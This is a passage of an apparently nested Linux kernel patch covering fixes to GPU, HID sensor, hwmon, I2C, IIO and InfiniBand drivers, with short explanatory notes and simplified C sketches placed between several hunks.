+ 	return r;
+ }
+@@ -457,27 +532,7 @@ EXPORT_SYMBOL(ttm_pool_alloc);
+  */
+ void ttm_pool_free(struct ttm_pool *pool, struct ttm_tt *tt)
+ {
+-	unsigned int i;
+-
+-	for (i = 0; i < tt->num_pages; ) {
+-		struct page *p = tt->pages[i];
+-		unsigned int order, num_pages;
+-		struct ttm_pool_type *pt;
+-
+-		order = ttm_pool_page_order(pool, p);
+-		num_pages = 1ULL << order;
+-		if (tt->dma_address)
+-			ttm_pool_unmap(pool, tt->dma_address[i], num_pages);
+-
+-		pt = ttm_pool_select_type(pool, tt->caching, order);
+-		if (pt)
+-			ttm_pool_type_give(pt, tt->pages[i]);
+-		else
+-			ttm_pool_free_page(pool, tt->caching, order,
+-					   tt->pages[i]);
+-
+-		i += num_pages;
+-	}
++	ttm_pool_free_range(pool, tt, tt->caching, 0, tt->num_pages);
+ 
+ 	while (atomic_long_read(&allocated_pages) > page_pool_size)
+ 		ttm_pool_shrink();
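
The ttm_pool rework funnels every free path, including the allocation-failure unwind, through one range helper that walks the page vector in order-sized strides; the error path additionally remembers a caching divide so pages whose caching attribute was already switched are released with the right mode. A schematic of the stride walk (greatly simplified, no pool logic):

  #include <stddef.h>

  /* orders[i] holds the allocation order of the compound page whose
   * first entry sits at index i of the page vector. */
  static void free_range(const unsigned int *orders,
                         void (*free_chunk)(size_t idx, unsigned int order),
                         size_t start, size_t end)
  {
      size_t i, nr;

      for (i = start; i < end; i += nr) {
          nr = (size_t)1 << orders[i];
          free_chunk(i, orders[i]);   /* releases all 1 << order pages */
      }
  }
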
+diff --git a/drivers/gpu/drm/vgem/vgem_fence.c b/drivers/gpu/drm/vgem/vgem_fence.c
+index c2a879734d407..e157541783959 100644
+--- a/drivers/gpu/drm/vgem/vgem_fence.c
++++ b/drivers/gpu/drm/vgem/vgem_fence.c
+@@ -249,4 +249,5 @@ void vgem_fence_close(struct vgem_file *vfile)
+ {
+ 	idr_for_each(&vfile->fence_idr, __vgem_fence_idr_fini, vfile);
+ 	idr_destroy(&vfile->fence_idr);
++	mutex_destroy(&vfile->fence_mutex);
+ }
+diff --git a/drivers/gpu/host1x/context.c b/drivers/gpu/host1x/context.c
+index b08cf11f9a661..047696432eb21 100644
+--- a/drivers/gpu/host1x/context.c
++++ b/drivers/gpu/host1x/context.c
+@@ -13,6 +13,11 @@
+ #include "context.h"
+ #include "dev.h"
+ 
++static void host1x_memory_context_release(struct device *dev)
++{
++	/* context device is freed in host1x_memory_context_list_free() */
++}
++
+ int host1x_memory_context_list_init(struct host1x *host1x)
+ {
+ 	struct host1x_memory_context_list *cdl = &host1x->context_list;
+@@ -53,28 +58,30 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 		dev_set_name(&ctx->dev, "host1x-ctx.%d", i);
+ 		ctx->dev.bus = &host1x_context_device_bus_type;
+ 		ctx->dev.parent = host1x->dev;
++		ctx->dev.release = host1x_memory_context_release;
+ 
+ 		dma_set_max_seg_size(&ctx->dev, UINT_MAX);
+ 
+ 		err = device_add(&ctx->dev);
+ 		if (err) {
+ 			dev_err(host1x->dev, "could not add context device %d: %d\n", i, err);
+-			goto del_devices;
++			put_device(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		err = of_dma_configure_id(&ctx->dev, node, true, &i);
+ 		if (err) {
+ 			dev_err(host1x->dev, "IOMMU configuration failed for context device %d: %d\n",
+ 				i, err);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		fwspec = dev_iommu_fwspec_get(&ctx->dev);
+ 		if (!fwspec || !device_iommu_mapped(&ctx->dev)) {
+ 			dev_err(host1x->dev, "Context device %d has no IOMMU!\n", i);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		ctx->stream_id = fwspec->ids[0] & 0xffff;
+@@ -82,11 +89,12 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 
+ 	return 0;
+ 
+-del_devices:
++unreg_devices:
+ 	while (i--)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
++	cdl->devs = NULL;
+ 	cdl->len = 0;
+ 
+ 	return err;
+@@ -97,7 +105,7 @@ void host1x_memory_context_list_free(struct host1x_memory_context_list *cdl)
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < cdl->len; i++)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
+ 	cdl->len = 0;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+index 47774b9ab3de0..c936d6a51c0cd 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+@@ -367,6 +367,14 @@ init_done:
+ 	return devm_add_action_or_reset(&pdev->dev, privdata->mp2_ops->remove, privdata);
+ }
+ 
++static void amd_sfh_shutdown(struct pci_dev *pdev)
++{
++	struct amd_mp2_dev *mp2 = pci_get_drvdata(pdev);
++
++	if (mp2 && mp2->mp2_ops)
++		mp2->mp2_ops->stop_all(mp2);
++}
++
+ static int __maybe_unused amd_mp2_pci_resume(struct device *dev)
+ {
+ 	struct amd_mp2_dev *mp2 = dev_get_drvdata(dev);
+@@ -401,6 +409,7 @@ static struct pci_driver amd_mp2_pci_driver = {
+ 	.id_table	= amd_mp2_pci_tbl,
+ 	.probe		= amd_mp2_pci_probe,
+ 	.driver.pm	= &amd_mp2_pm_ops,
++	.shutdown	= amd_sfh_shutdown,
+ };
+ module_pci_driver(amd_mp2_pci_driver);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+index 0609fea581c96..6f0d332ccf51c 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+@@ -218,7 +218,7 @@ static u8 get_input_rep(u8 current_index, int sensor_idx, int report_id,
+ 			     OFFSET_SENSOR_DATA_DEFAULT;
+ 		memcpy_fromio(&als_data, sensoraddr, sizeof(struct sfh_als_data));
+ 		get_common_inputs(&als_input.common_property, report_id);
+-		als_input.illuminance_value = als_data.lux;
++		als_input.illuminance_value = float_to_int(als_data.lux);
+ 		report_size = sizeof(als_input);
+ 		memcpy(input_report, &als_input, sizeof(als_input));
+ 		break;
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index a1d6e08fab7d4..bb8bd7892b674 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -112,6 +112,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 	cl_data->num_hid_devices = amd_sfh_get_sensor_num(privdata, &cl_data->sensor_idx[0]);
+ 	if (cl_data->num_hid_devices == 0)
+ 		return -ENODEV;
++	cl_data->is_any_sensor_enabled = false;
+ 
+ 	INIT_DELAYED_WORK(&cl_data->work, amd_sfh_work);
+ 	INIT_DELAYED_WORK(&cl_data->work_buffer, amd_sfh_work_buffer);
+@@ -170,6 +171,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 		status = (status == 0) ? SENSOR_ENABLED : SENSOR_DISABLED;
+ 
+ 		if (status == SENSOR_ENABLED) {
++			cl_data->is_any_sensor_enabled = true;
+ 			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+ 			rc = amdtp_hid_probe(i, cl_data);
+ 			if (rc) {
+@@ -186,12 +188,21 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 					cl_data->sensor_sts[i]);
+ 				goto cleanup;
+ 			}
++		} else {
++			cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 		}
+ 		dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n",
++			 cl_data->is_any_sensor_enabled);
++		rc = -EOPNOTSUPP;
++		goto cleanup;
++	}
++
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+ 	return 0;
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+index c6df959ec7252..4f81ef2d4f56e 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+@@ -16,11 +16,11 @@ static int amd_sfh_wait_response(struct amd_mp2_dev *mp2, u8 sid, u32 cmd_id)
+ {
+ 	struct sfh_cmd_response cmd_resp;
+ 
+-	/* Get response with status within a max of 1600 ms timeout */
++	/* Get response with status within a max of 10000 ms timeout */
+ 	if (!readl_poll_timeout(mp2->mmio + AMD_P2C_MSG(0), cmd_resp.resp,
+ 				(cmd_resp.response.response == 0 &&
+ 				cmd_resp.response.cmd_id == cmd_id && (sid == 0xff ||
+-				cmd_resp.response.sensor_id == sid)), 500, 1600000))
++				cmd_resp.response.sensor_id == sid)), 500, 10000000))
+ 		return cmd_resp.response.response;
+ 
+ 	return -1;
+@@ -33,6 +33,7 @@ static void amd_start_sensor(struct amd_mp2_dev *privdata, struct amd_mp2_sensor
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = ENABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = info.sensor_idx;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+@@ -45,6 +46,7 @@ static void amd_stop_sensor(struct amd_mp2_dev *privdata, u16 sensor_idx)
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = sensor_idx;
+ 
+ 	writeq(0x0, privdata->mmio + AMD_C2P_MSG(1));
+@@ -56,8 +58,10 @@ static void amd_stop_all_sensor(struct amd_mp2_dev *privdata)
+ 	struct sfh_cmd_base cmd_base;
+ 
+ 	cmd_base.ul = 0;
+-	cmd_base.cmd.cmd_id = STOP_ALL_SENSORS;
++	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	/* 0xf indicates all sensors */
++	cmd_base.cmd.sensor_id = 0xf;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+ }
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+index ae47a369dc05a..9d31d5b510eb4 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+@@ -33,9 +33,9 @@ struct sfh_cmd_base {
+ 		struct {
+ 			u32 sensor_id		: 4;
+ 			u32 cmd_id		: 4;
+-			u32 sub_cmd_id		: 6;
+-			u32 length		: 12;
+-			u32 rsvd		: 5;
++			u32 sub_cmd_id		: 8;
++			u32 sub_cmd_value	: 12;
++			u32 rsvd		: 3;
+ 			u32 intr_disable	: 1;
+ 		} cmd;
+ 	};
+@@ -133,7 +133,7 @@ struct sfh_mag_data {
+ 
+ struct sfh_als_data {
+ 	struct sfh_common_data commondata;
+-	u16 lux;
++	u32 lux;
+ };
+ 
+ struct hpd_status {
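
The interface header now partitions the 32-bit command word as 4 + 4 + 8 + 12 + 3 + 1 bits, trading the old length/reserved bits for a wider sub-command id plus a sub-command value that the enable/disable commands set to 1. A quick compile-time check that such a layout still fills exactly one 32-bit word (bitfield ordering is compiler-defined, so this is illustrative only):

  #include <assert.h>
  #include <stdint.h>

  struct cmd_word {
      uint32_t sensor_id     : 4;
      uint32_t cmd_id        : 4;
      uint32_t sub_cmd_id    : 8;
      uint32_t sub_cmd_value : 12;
      uint32_t rsvd          : 3;
      uint32_t intr_disable  : 1;   /* 4+4+8+12+3+1 = 32 bits */
  };

  static_assert(sizeof(struct cmd_word) == sizeof(uint32_t),
                "command word must stay exactly 32 bits");
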
+diff --git a/drivers/hte/hte-tegra194-test.c b/drivers/hte/hte-tegra194-test.c
+index 5d776a185bd62..ce8c44e792213 100644
+--- a/drivers/hte/hte-tegra194-test.c
++++ b/drivers/hte/hte-tegra194-test.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/err.h>
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
+ #include <linux/interrupt.h>
+diff --git a/drivers/hte/hte-tegra194.c b/drivers/hte/hte-tegra194.c
+index 49a27af22742b..d1b579c822797 100644
+--- a/drivers/hte/hte-tegra194.c
++++ b/drivers/hte/hte-tegra194.c
+@@ -251,7 +251,7 @@ static int tegra_hte_map_to_line_id(u32 eid,
+ {
+ 
+ 	if (m) {
+-		if (eid > map_sz)
++		if (eid >= map_sz)
+ 			return -EINVAL;
+ 		if (m[eid].slice == NV_AON_SLICE_INVALID)
+ 			return -EINVAL;
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 6e4c92b500b8e..6a6ebcc896b1d 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -1604,9 +1604,9 @@ static int adt7475_set_pwm_polarity(struct i2c_client *client)
+ 	int ret, i;
+ 	u8 val;
+ 
+-	ret = of_property_read_u32_array(client->dev.of_node,
+-					 "adi,pwm-active-state", states,
+-					 ARRAY_SIZE(states));
++	ret = device_property_read_u32_array(&client->dev,
++					     "adi,pwm-active-state", states,
++					     ARRAY_SIZE(states));
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 5a9d47a229e40..be8bbb1c3a02d 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -75,6 +75,7 @@ static DEFINE_MUTEX(nb_smu_ind_mutex);
+ 
+ #define ZEN_CUR_TEMP_SHIFT			21
+ #define ZEN_CUR_TEMP_RANGE_SEL_MASK		BIT(19)
++#define ZEN_CUR_TEMP_TJ_SEL_MASK		GENMASK(17, 16)
+ 
+ struct k10temp_data {
+ 	struct pci_dev *pdev;
+@@ -155,7 +156,8 @@ static long get_raw_temp(struct k10temp_data *data)
+ 
+ 	data->read_tempreg(data->pdev, &regval);
+ 	temp = (regval >> ZEN_CUR_TEMP_SHIFT) * 125;
+-	if (regval & data->temp_adjust_mask)
++	if ((regval & data->temp_adjust_mask) ||
++	    (regval & ZEN_CUR_TEMP_TJ_SEL_MASK) == ZEN_CUR_TEMP_TJ_SEL_MASK)
+ 		temp -= 49000;
+ 	return temp;
+ }
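
The k10temp change widens the offset condition: the raw reading decodes as (regval >> 21) * 125 millidegrees, and the 49 degC adjustment now also applies when both Tj-select bits (17:16) are set, not only when the per-model adjust mask matches (on Zen parts that mask is the range-select bit). The decode in plain C, with the mask values copied from the hunk:

  #include <stdint.h>

  #define CUR_TEMP_SHIFT          21
  #define CUR_TEMP_RANGE_SEL_MASK (1u << 19)
  #define CUR_TEMP_TJ_SEL_MASK    (3u << 16)  /* GENMASK(17, 16) */

  /* Returns the temperature in millidegrees Celsius. */
  static long decode_temp(uint32_t regval)
  {
      long temp = (regval >> CUR_TEMP_SHIFT) * 125;

      if ((regval & CUR_TEMP_RANGE_SEL_MASK) ||
          (regval & CUR_TEMP_TJ_SEL_MASK) == CUR_TEMP_TJ_SEL_MASK)
          temp -= 49000;
      return temp;
  }
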
+diff --git a/drivers/hwmon/pmbus/fsp-3y.c b/drivers/hwmon/pmbus/fsp-3y.c
+index aec294cc72d1f..c7469d2cdedcf 100644
+--- a/drivers/hwmon/pmbus/fsp-3y.c
++++ b/drivers/hwmon/pmbus/fsp-3y.c
+@@ -180,7 +180,6 @@ static struct pmbus_driver_info fsp3y_info[] = {
+ 			PMBUS_HAVE_FAN12,
+ 		.func[YM2151_PAGE_5VSB_LOG] =
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_IOUT,
+-			PMBUS_HAVE_IIN,
+ 		.read_word_data = fsp3y_read_word_data,
+ 		.read_byte_data = fsp3y_read_byte_data,
+ 	},
+diff --git a/drivers/hwtracing/coresight/coresight-etm-perf.c b/drivers/hwtracing/coresight/coresight-etm-perf.c
+index 43bbd5dc3d3b1..f9a0ee49d8e80 100644
+--- a/drivers/hwtracing/coresight/coresight-etm-perf.c
++++ b/drivers/hwtracing/coresight/coresight-etm-perf.c
+@@ -870,6 +870,7 @@ int __init etm_perf_init(void)
+ 	etm_pmu.addr_filters_sync	= etm_addr_filters_sync;
+ 	etm_pmu.addr_filters_validate	= etm_addr_filters_validate;
+ 	etm_pmu.nr_addr_filters		= ETM_ADDR_CMP_MAX;
++	etm_pmu.module			= THIS_MODULE;
+ 
+ 	ret = perf_pmu_register(&etm_pmu, CORESIGHT_ETM_PMU_NAME, -1);
+ 	if (ret == 0)
+diff --git a/drivers/i2c/busses/i2c-cadence.c b/drivers/i2c/busses/i2c-cadence.c
+index f58943cb13414..8a5fdb150c446 100644
+--- a/drivers/i2c/busses/i2c-cadence.c
++++ b/drivers/i2c/busses/i2c-cadence.c
+@@ -833,8 +833,10 @@ static int cdns_i2c_master_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs,
+ #if IS_ENABLED(CONFIG_I2C_SLAVE)
+ 	/* Check i2c operating mode and switch if possible */
+ 	if (id->dev_mode == CDNS_I2C_MODE_SLAVE) {
+-		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE)
+-			return -EAGAIN;
++		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE) {
++			ret = -EAGAIN;
++			goto out;
++		}
+ 
+ 		/* Set mode to master */
+ 		cdns_i2c_set_mode(CDNS_I2C_MODE_MASTER, id);
+diff --git a/drivers/i2c/busses/i2c-omap.c b/drivers/i2c/busses/i2c-omap.c
+index f9ae520aed228..7ec2521997061 100644
+--- a/drivers/i2c/busses/i2c-omap.c
++++ b/drivers/i2c/busses/i2c-omap.c
+@@ -1058,7 +1058,7 @@ omap_i2c_isr(int irq, void *dev_id)
+ 	u16 stat;
+ 
+ 	stat = omap_i2c_read_reg(omap, OMAP_I2C_STAT_REG);
+-	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG);
++	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG) & ~OMAP_I2C_STAT_NACK;
+ 
+ 	if (stat & mask)
+ 		ret = IRQ_WAKE_THREAD;
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index 277a02455cddd..effae4d467291 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -704,7 +704,7 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 	err = xiic_start_xfer(i2c, msgs, num);
+ 	if (err < 0) {
+ 		dev_err(adap->dev.parent, "Error xiic_start_xfer\n");
+-		return err;
++		goto out;
+ 	}
+ 
+ 	err = wait_for_completion_timeout(&i2c->completion, XIIC_XFER_TIMEOUT);
+@@ -722,6 +722,8 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 		err = (i2c->state == STATE_DONE) ? num : -EIO;
+ 	}
+ 	mutex_unlock(&i2c->lock);
++
++out:
+ 	pm_runtime_mark_last_busy(i2c->dev);
+ 	pm_runtime_put_autosuspend(i2c->dev);
+ 	return err;
+diff --git a/drivers/iio/adc/palmas_gpadc.c b/drivers/iio/adc/palmas_gpadc.c
+index fd000345ec5cf..849a697a467e5 100644
+--- a/drivers/iio/adc/palmas_gpadc.c
++++ b/drivers/iio/adc/palmas_gpadc.c
+@@ -639,7 +639,7 @@ out:
+ 
+ static int palmas_gpadc_remove(struct platform_device *pdev)
+ {
+-	struct iio_dev *indio_dev = dev_to_iio_dev(&pdev->dev);
++	struct iio_dev *indio_dev = dev_get_drvdata(&pdev->dev);
+ 	struct palmas_gpadc *adc = iio_priv(indio_dev);
+ 
+ 	if (adc->wakeup1_enable || adc->wakeup2_enable)
+diff --git a/drivers/iio/addac/stx104.c b/drivers/iio/addac/stx104.c
+index 48a91a95e597b..b658a75d4e3a8 100644
+--- a/drivers/iio/addac/stx104.c
++++ b/drivers/iio/addac/stx104.c
+@@ -15,6 +15,7 @@
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
++#include <linux/mutex.h>
+ #include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+@@ -69,10 +70,12 @@ struct stx104_reg {
+ 
+ /**
+  * struct stx104_iio - IIO device private data structure
++ * @lock: synchronization lock to prevent I/O race conditions
+  * @chan_out_states:	channels' output states
+  * @reg:		I/O address offset for the device registers
+  */
+ struct stx104_iio {
++	struct mutex lock;
+ 	unsigned int chan_out_states[STX104_NUM_OUT_CHAN];
+ 	struct stx104_reg __iomem *reg;
+ };
+@@ -114,6 +117,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 			return IIO_VAL_INT;
+ 		}
+ 
++		mutex_lock(&priv->lock);
++
+ 		/* select ADC channel */
+ 		iowrite8(chan->channel | (chan->channel << 4), &reg->achan);
+ 
+@@ -124,6 +129,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 		while (ioread8(&reg->cir_asr) & BIT(7));
+ 
+ 		*val = ioread16(&reg->ssr_ad);
++
++		mutex_unlock(&priv->lock);
+ 		return IIO_VAL_INT;
+ 	case IIO_CHAN_INFO_OFFSET:
+ 		/* get ADC bipolar/unipolar configuration */
+@@ -178,9 +185,12 @@ static int stx104_write_raw(struct iio_dev *indio_dev,
+ 			if ((unsigned int)val > 65535)
+ 				return -EINVAL;
+ 
++			mutex_lock(&priv->lock);
++
+ 			priv->chan_out_states[chan->channel] = val;
+ 			iowrite16(val, &priv->reg->dac[chan->channel]);
+ 
++			mutex_unlock(&priv->lock);
+ 			return 0;
+ 		}
+ 		return -EINVAL;
+@@ -351,6 +361,8 @@ static int stx104_probe(struct device *dev, unsigned int id)
+ 
+ 	indio_dev->name = dev_name(dev);
+ 
++	mutex_init(&priv->lock);
++
+ 	/* configure device for software trigger operation */
+ 	iowrite8(0, &priv->reg->acr);
+ 
+diff --git a/drivers/iio/light/max44009.c b/drivers/iio/light/max44009.c
+index 801e5a0ad496b..f3648f20ef2c0 100644
+--- a/drivers/iio/light/max44009.c
++++ b/drivers/iio/light/max44009.c
+@@ -528,6 +528,12 @@ static int max44009_probe(struct i2c_client *client,
+ 	return devm_iio_device_register(&client->dev, indio_dev);
+ }
+ 
++static const struct of_device_id max44009_of_match[] = {
++	{ .compatible = "maxim,max44009" },
++	{ }
++};
++MODULE_DEVICE_TABLE(of, max44009_of_match);
++
+ static const struct i2c_device_id max44009_id[] = {
+ 	{ "max44009", 0 },
+ 	{ }
+@@ -537,18 +543,13 @@ MODULE_DEVICE_TABLE(i2c, max44009_id);
+ static struct i2c_driver max44009_driver = {
+ 	.driver = {
+ 		.name = MAX44009_DRV_NAME,
++		.of_match_table = max44009_of_match,
+ 	},
+ 	.probe = max44009_probe,
+ 	.id_table = max44009_id,
+ };
+ module_i2c_driver(max44009_driver);
+ 
+-static const struct of_device_id max44009_of_match[] = {
+-	{ .compatible = "maxim,max44009" },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(of, max44009_of_match);
+-
+ MODULE_AUTHOR("Robert Eshleman <bobbyeshleman@gmail.com>");
+ MODULE_LICENSE("GPL v2");
+ MODULE_DESCRIPTION("MAX44009 ambient light sensor driver");
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index 1f9938a2c4752..b7f9023442890 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -2912,6 +2912,8 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 	    (ari && ari_length > IB_CM_REJ_ARI_LENGTH))
+ 		return -EINVAL;
+ 
++	trace_icm_send_rej(&cm_id_priv->id, reason);
++
+ 	switch (state) {
+ 	case IB_CM_REQ_SENT:
+ 	case IB_CM_MRA_REQ_RCVD:
+@@ -2942,7 +2944,6 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 		return -EINVAL;
+ 	}
+ 
+-	trace_icm_send_rej(&cm_id_priv->id, reason);
+ 	ret = ib_post_send_mad(msg, NULL);
+ 	if (ret) {
+ 		cm_free_msg(msg);
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index c533c693e5e38..2eb41e6d94c4f 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -112,6 +112,10 @@
+ 
+ #define ERDMA_PAGE_SIZE_SUPPORT 0x7FFFF000
+ 
++/* Hardware page size definition */
++#define ERDMA_HW_PAGE_SHIFT 12
++#define ERDMA_HW_PAGE_SIZE 4096
++
+ /* WQE related. */
+ #define EQE_SIZE 16
+ #define EQE_SHIFT 4
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 19c69ea1b0c0f..654d8513873ec 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -38,7 +38,7 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		   FIELD_PREP(ERDMA_CMD_CREATE_QP_PD_MASK, pd->pdn);
+ 
+ 	if (rdma_is_kernel_res(&qp->ibqp.res)) {
+-		u32 pgsz_range = ilog2(SZ_1M) - PAGE_SHIFT;
++		u32 pgsz_range = ilog2(SZ_1M) - ERDMA_HW_PAGE_SHIFT;
+ 
+ 		req.sq_cqn_mtt_cfg =
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+@@ -66,13 +66,13 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		user_qp = &qp->user_qp;
+ 		req.sq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->sq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->sq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.sq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->scq->cqn);
+ 
+ 		req.rq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->rq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->rq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.rq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->rcq->cqn);
+ 
+@@ -163,7 +163,7 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 	if (rdma_is_kernel_res(&cq->ibcq.res)) {
+ 		page_size = SZ_32M;
+ 		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(page_size) - PAGE_SHIFT);
++				       ilog2(page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.qbuf_addr_l = lower_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 		req.qbuf_addr_h = upper_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 
+@@ -176,8 +176,9 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 			cq->kern_cq.qbuf_dma_addr + (cq->depth << CQE_SHIFT);
+ 	} else {
+ 		mtt = &cq->user_cq.qbuf_mtt;
+-		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(mtt->page_size) - PAGE_SHIFT);
++		req.cfg0 |=
++			FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
++				   ilog2(mtt->page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		if (mtt->mtt_nents == 1) {
+ 			req.qbuf_addr_l = lower_32_bits(*(u64 *)mtt->mtt_buf);
+ 			req.qbuf_addr_h = upper_32_bits(*(u64 *)mtt->mtt_buf);
+@@ -618,7 +619,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	u32 rq_offset;
+ 	int ret;
+ 
+-	if (len < (PAGE_ALIGN(qp->attrs.sq_size * SQEBB_SIZE) +
++	if (len < (ALIGN(qp->attrs.sq_size * SQEBB_SIZE, ERDMA_HW_PAGE_SIZE) +
